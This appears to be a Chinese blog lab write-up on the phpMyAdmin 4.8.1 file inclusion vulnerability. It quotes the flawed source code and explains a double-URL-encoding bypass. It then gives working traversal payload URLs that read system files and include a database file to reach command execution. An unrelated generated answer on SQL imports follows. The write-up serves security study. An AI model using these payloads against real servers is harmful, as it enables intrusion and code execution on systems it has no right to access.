phpmyadmin 4.8.1 文件包含漏

一、 启动环境

1.双击运行桌面phpstudy.exe软件
在这里插入图片描述
2.点击启动按钮,启动服务器环境

二、代码审计

1.双击启动桌面Seay源代码审计系统软件

在这里插入图片描述
3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\phpmyadmin),点击确定

漏洞分析

1.双击index.php页面,将鼠标滚动到页面第53行

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];//此处!!
    exit;
}

可以看到其中包含target参数过来的变量,包含过程并没有任何过滤。
2.目前漏洞利用的关键能够绕过if判断,首先判断target参数是否是字符串,再检测target不能以index开头,然后在判断target参数不能在$target_blacklist数组里面,数组内容

$target_blacklist = array (
    'import.php', 'export.php'
);

3.前三个条件可以轻松绕过,最后需要进入到Core类中的checkPageValidity进行检查
/libraries/classes/Core.php

public static function checkPageValidity(&$page, array $whitelist = [])
{
   if (empty($whitelist)) {
       $whitelist = self::$goto_whitelist;
   }
   if (! isset($page) || !is_string($page)) {
       return false;
   }

   if (in_array($page, $whitelist)) {
       return true;
   }

   $_page = mb_substr(
       $page,
       0,
       mb_strpos($page . '?', '?')
   );
   if (in_array($_page, $whitelist)) {
       return true;
   }

   $_page = urldecode($page);//问题出在这里
   $_page = mb_substr(
       $_page,
       0,
       mb_strpos($_page . '?', '?')
   );
   if (in_array($_page, $whitelist)) {
       return true;
   }

   return false;
}

绕过这个方法检查的关键在于程序对传入的target进行了进行了解码,我们可以完全按照二次编码绕过方法检查。

漏洞利用

1.访问ip/phpmyadmin/index.php,然后登陆页面
2.输入攻击payload

phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../windows/win.ini 

3.攻击结果
在这里插入图片描述
查看数据库存放的物理位置

show global variables like "%datadir%";

在这里插入图片描述

向表中插入一条数据

在这里插入图片描述
在这里插入图片描述
访问

http://192.168.91.136/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/test/test.MYD

在这里插入图片描述
插入命令执行
在这里插入图片描述
结果
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
当使用phpMyAdmin导入SQL文件时,可能会遇到一些问题。根据引用,如果您的数据库大于2M,则无法直接导入。为了解决这个问题,您可以考虑以下几个方法: 1. 使用命令行导入:通过命令行工具,您可以使用MySQL命令来导入大型SQL文件。这种方法可以绕过phpMyAdmin的限制。您可以使用以下命令导入SQL文件:mysql -u username -p database_name < file.sql,其中username是您的MySQL用户名,database_name是要导入到的数据库名,file.sql是要导入的SQL文件的路径。 2. 分割SQL文件:如果您无法使用命令行,您可以尝试将SQL文件分割成更小的部分,然后逐个导入。这样可以避免导入过大的文件。 3. 修改php.ini配置文件:如果您有权限访问服务器的php.ini配置文件,可以尝试增加上传文件的大小限制。找到并修改以下两个配置项的值:upload_max_filesize和post_max_size。将它们设置为适当的大小,以容纳您的SQL文件。 同时,根据引用和引用的内容,还有可能出现其他错误。请确保您的SQL文件的语法正确,并且与您的MySQL服务器版本兼容。如果遇到语法错误,请参考MySQL服务器文档查找正确的语法和用法。 希望以上方法对您有所帮助。如果您遇到其他问题,请提供更多详细信息,以便我能够更准确地为您提供帮助。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [修改phpMyAdmin导入SQL文件的大小限制](https://download.csdn.net/download/weixin_38710557/14833172)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [求助,phpmyadmin导入sql文件提示1064错误](https://blog.csdn.net/weixin_35990295/article/details/116214022)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值